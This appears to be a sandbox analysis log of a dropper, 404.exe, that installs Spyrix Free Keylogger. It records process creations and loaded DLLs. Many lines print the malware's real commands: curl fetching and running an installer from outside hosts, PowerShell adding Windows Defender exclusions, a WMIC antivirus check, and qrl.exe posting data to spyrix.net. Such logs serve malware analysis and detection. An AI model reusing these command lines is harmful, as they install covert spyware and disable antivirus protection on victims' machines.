Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Users\user\Desktop\404.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Process created: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\regedit.exe "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\reg.exe "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\404.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\404.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
